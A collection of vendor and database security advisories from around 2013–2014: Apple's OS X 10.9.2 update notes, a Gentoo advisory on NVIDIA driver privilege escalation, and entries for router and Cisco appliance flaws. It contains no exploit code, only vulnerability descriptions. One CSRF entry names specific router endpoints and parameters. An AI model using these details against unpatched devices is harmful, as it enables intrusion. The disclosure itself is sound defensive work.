Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in Apache
Description: Multiple vulnerabilities existed in Apache, the most
serious of which may lead to cross-site scripting. These issues were
addressed by updating Apache to version 2.2.26.
CVE-ID
CVE-2013-1862
CVE-2013-1896
App Sandbox
Available for: OS X Mountain Lion v10.8.5
Impact: The App Sandbox may be bypassed
Description: The LaunchServices interface for launching an
application allowed sandboxed apps to specify the list of arguments
passed to the new process. A compromised sandboxed application could
abuse this to bypass the sandbox. This issue was addressed by
preventing sandboxed applications from specifying arguments. This
issue does not affect systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2013-5179 : Friedrich Graeter of The Soulmen GbR
ATS
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to arbitrary code execution
Description: A memory corruption issue existed in the handling of
handling of Type 1 fonts. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1254 : Felix Groebert of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A memory corruption issue existed in the handling of
Mach messages passed to ATS. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1262 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: An arbitrary free issue existed in the handling of Mach
messages passed to ATS. This issue was addressed through additional
validation of Mach messages.
CVE-ID
CVE-2014-1255 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A buffer overflow issue existed in the handling of Mach
messages passed to ATS. This issue was addressed by additional bounds
checking.
CVE-ID
CVE-2014-1256 : Meder Kydyraliev of the Google Security Team
Certificate Trust Policy
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Root certificates have been updated
Description: The set of system root certificates has been updated.
The complete list of recognized system roots may be viewed via the
Keychain Access application.
CFNetwork Cookies
Available for: OS X Mountain Lion v10.8.5
Impact: Session cookies may persist even after resetting Safari
Description: Resetting Safari did not always delete session cookies
until Safari was closed. This issue was addressed through improved
handling of session cookies. This issue does not affect systems
running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1257 : Rob Ansaldo of Amherst College, Graham Bennett
CoreAnimation
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Visiting a maliciously crafted site may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in CoreAnimation's
handling of images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1258 : Karl Smith of NCC Group
CoreText
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Applications that use CoreText may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in CoreText in the handling
of Unicode fonts. This issue is addressed through improved bounds
checking.
CVE-ID
CVE-2014-1261 : Lucas Apa and Carlos Mario Penagos of IOActive Labs
curl
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: When using curl to connect to an HTTPS URL containing
an IP address, the IP address was not validated against the
certificate. This issue does not affect systems prior to OS X
Mavericks v10.9.
CVE-ID
CVE-2014-1263 : Roland Moriz of Moriz GmbH
Data Security
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may capture
or modify data in sessions protected by SSL/TLS
Description: Secure Transport failed to validate the authenticity of
the connection. This issue was addressed by restoring missing
validation steps.
CVE-ID
CVE-2014-1266
Date and Time
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: An unprivileged user may change the system clock
Description: This update changes the behavior of the systemsetup
command to require administrator privileges to change the system
clock.
CVE-ID
CVE-2014-1265
File Bookmark
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a file with a maliciously crafted name may lead to
an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of file
names. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1259
Finder
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Accessing a file's ACL via Finder may lead to other users
gaining unauthorized access to files
Description: Accessing a file's ACL via Finder may corrupt the ACLs
on the file. This issue was addressed through improved handling of
ACLs.
CVE-ID
CVE-2014-1264
ImageIO
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed by better JPEG handling.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOSerialFamily
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: Executing a malicious application may result in arbitrary
code execution within the kernel
Description: An out of bounds array access existed in the
IOSerialFamily driver. This issue was addressed through additional
bounds checking. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5139 : @dent1zt
LaunchServices
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: A file could show the wrong extension
Description: An issue existed in the handling of certain unicode
characters that could allow filenames to show incorrect extensions.
The issue was addressed by filtering unsafe unicode characters from
display in filenames. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5178 : Jesse Ruderman of Mozilla Corporation, Stephane Sudre
of Intego
NVIDIA Drivers
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Executing a malicious application could result in arbitrary
code execution within the graphics card
Description: An issue existed that allowed writes to some trusted
memory on the graphics card. This issue was addressed by removing the
ability of the host to write to that memory.
CVE-ID
CVE-2013-5986 : Marcin Kościelnicki from the X.Org Foundation
Nouveau project
CVE-2013-5987 : Marcin Kościelnicki from the X.Org Foundation
Nouveau project
PHP
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP, the most
serious of which may have led to arbitrary code execution. These
issues were addressed by updating PHP to version 5.4.22 on OS X
Mavericks v10.9, and 5.3.28 on OS X Lion and Mountain Lion.
CVE-ID
CVE-2013-4073
CVE-2013-4113
CVE-2013-4248
CVE-2013-6420
QuickLook
Available for: OS X Mountain Lion v10.8.5
Impact: Downloading a maliciously crafted Microsoft Office file may
lead to an unexpected application termination or arbitrary code
execution
Description: A memory corruption issue existed in QuickLook's
handling of Microsoft Office files. Downloading a maliciously crafted
Microsoft Office file may have led to an unexpected application
termination or arbitrary code execution. This issue does not affect
systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1260 : Felix Groebert of the Google Security Team
QuickLook
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Downloading a maliciously crafted Microsoft Word document
may lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in QuickLook's handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ftab'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1246 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
'dref' atoms. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1247 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ldat'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1248 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted PSD image may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PSD
images. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1249 : dragonltx of Tencent Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An out of bounds byte swapping issue existed in the
handling of 'ttfo' elements. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1250 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of 'stsz'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1245 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
Secure Transport
Available for: OS X Mountain Lion v10.8.5
Impact: An attacker may be able to decrypt data protected by SSL
Description: There were known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite used a block cipher in CBC mode.
To address these issues for applications using Secure Transport, the
1-byte fragment mitigation was enabled by default for this
configuration.
CVE-ID
CVE-2011-3389 : Juliano Rizzo and Thai Duong
OS X Mavericks v10.9.2 includes the content of Safari 7.0.2.
OS X Mavericks v10.9.2 and Security Update 2014-001 may be obtained from
the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJTDNeoAAoJEPefwLHPlZEwaRAP/3i/2qRvNv6JqmE9p48uEyXn
mlxwXpMyop+vrgMmuiSP14EGSv06HO04PNUtaWPxm7tVYXu0tMtjDcYdIu40TAy6
U0T6QhRZC/uag1DCvdEOvqRUajKmmPtHTCJ6OsQGtGJHlEM+S5XgxRr7qgfkHMfb
OlqFsgpdL/AAiYNfzItN2C+r2Lfwro6LDlxhikpASojlMFQrk8nJ6irRv617anSZ
3DwJW2iJxNfpVrgqA1Nrx1fkrPmeT/8jgGuEP6RaKiWIbfXjRG5BW9WuarMqmaP8
C6XoTaJaqEO9zb7F2uJR0HIYpJd065y/xiYNm91yDWIjdrO3wVgNVPGo1pHVyYsY
Y7lcyHUVJortKF8SHquw0j3Ujeugu8iWp6ND/00/4dGvwb0jzrxPUxkEmJ43130O
t2Obtxdsaa+ub8cZHDN93WB3FQR5hd+KaeXLJC55q0qYY8o8zqdPqXAlYAP2gUQX
iB4Bs7NAh2CNJWNTtk2soTjZOwPvPLSPZ6I3w5i0HVP7HQl5K8chjihAwSeyezCZ
q5gxCiK0lBW88AUd9n3L7ZOW2Rg53mh6+RiUL/VQ7TfidoP417VDKum300pZkgNv
kBCklX9ya7QeLjOMnbnsTk32qG+TiDPgiGZ5IrK6C6T26dexJWbm8tuwPjy5r8mI
aiYIh+SzR0rBdMZRgyzv
=+DAJ
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201402-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: NVIDIA Drivers: Privilege Escalation
Date: February 02, 2014
Bugs: #493448
ID: 201402-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A NVIDIA drivers bug allows unprivileged user-mode software to access
the GPU inappropriately, allowing for privilege escalation.
Background
==========
The NVIDIA drivers provide X11 and GLX support for NVIDIA graphic
boards.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-drivers/nvidia-drivers
< 331.20 *>= 304.116
*>= 319.76
>= 331.20
Description
===========
The vulnerability is caused due to the driver allowing unprivileged
user-mode software to access the GPU.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All NVIDIA Drivers users using the 331 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-331.20"
All NVIDIA Drivers users using the 319 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-319.76"
All NVIDIA Drivers users using the 304 branch should upgrade to the
latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=x11-drivers/nvidia-drivers-304.116"
References
==========
[ 1 ] CVE-2013-5986
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5986
[ 2 ] CVE-2013-5987
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5987
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201402-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201312-0547 | No CVE | D-Link DIR Series Router 'model/__show_info.php' Local File Disclosure Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The D-Link DIR series router 'model/__show_info.php' failed to properly validate user-submitted input, allowing remote attackers to exploit vulnerabilities to submit malicious requests for sensitive file information. D-Link DIR-615 and other wireless router products from D-Link.
A local file leak vulnerability exists in several D-Link DIR series routers. The vulnerability stems from the program's insufficient filtering of user-submitted input. An attacker could use this vulnerability to obtain sensitive information. The following models and versions have vulnerabilities: D-Link DIR-615 0, D-Link DIR-300 2.05B03, D-Link DIR-300 2.04, D-Link DIR-300 2.01B1, D-Link DIR-300 1.05B09, D-Link DIR-300 1.05, D-Link DIR-300 1.04, D-Link DIR-300 0. This may aid in further attacks
| VAR-201312-0236 | CVE-2013-6695 |
Cisco Secure Access Control System of RBAC Vulnerability in which important information is obtained in the implementation of
Related entries in the VARIoT exploits database: VAR-E-201312-0241 |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The RBAC implementation in Cisco Secure Access Control System (ACS) does not properly verify privileges for support-bundle downloads, which allows remote authenticated users to obtain sensitive information via a download action, as demonstrated by obtaining read access to the user database, aka Bug ID CSCuj39274. Cisco Secure ACS is a central management platform for Cisco network devices that controls device authentication and authorization.
Successful exploits will allow attackers to obtain sensitive information. This may result in further attacks.
This issue is tracked by Cisco Bug ID CSCuj39274. The system can respectively control network access and network device access through RADIUS and TACACS protocols
| VAR-201312-0237 | CVE-2013-6696 | Cisco Adaptive Security Appliance Service disruption in software (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Cisco Adaptive Security Appliance (ASA) Software does not properly handle errors during the processing of DNS responses, which allows remote attackers to cause a denial of service (device reload) via a malformed response, aka Bug ID CSCuj28861. Vendors have confirmed this vulnerability Bug ID CSCuj28861 It is released as.Third-party service disruption via malformed response ( Device reload ) There is a possibility of being put into a state. Cisco ASA Software is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuj28861
| VAR-201312-0304 | CVE-2013-7043 | Cisco Scientific Atlanta DPR2320 Cross-site request forgery vulnerability in router software |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity; (2) reboot the device via the Restart parameter to goform/restart; (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity; or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic. The Cisco DPR2320R2 Wireless Router is a wireless router product from the United States Cisco.
A cross-site request forgery vulnerability exists in the Cisco DPR2320R2 wireless router using firmware version 2.0.2r1262-090417. A remote attacker could use this vulnerability to perform administrator actions to control the affected device. Cisco Scientific Atlanta DPR2320R2 is a cable modem gateway device of Cisco (Cisco). The device includes a cable modem, router and wireless access point, enabling multiple PCs, notebooks or other network devices to share broadband access
| VAR-201311-0241 | CVE-2013-6918 | Satechi Smart Travel Router Web Management Console Remote Authentication Bypass Vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The web interface on the Satechi travel router 1.5, when Wi-Fi is used for WAN access, exposes the console without authentication on the WAN IP address regardless of the "Web Management via WAN" setting, which allows remote attackers to bypass intended access restrictions via HTTP requests. The Satechi Smart Travel Router is a wireless router device. A remote attacker can bypass the access restriction control device by submitting an HTTP request. Satechi Travel Router is a portable router product of American Satechi Company that includes standard international plug adapters, USB chargers and WiFi (802.11b/g/n) routers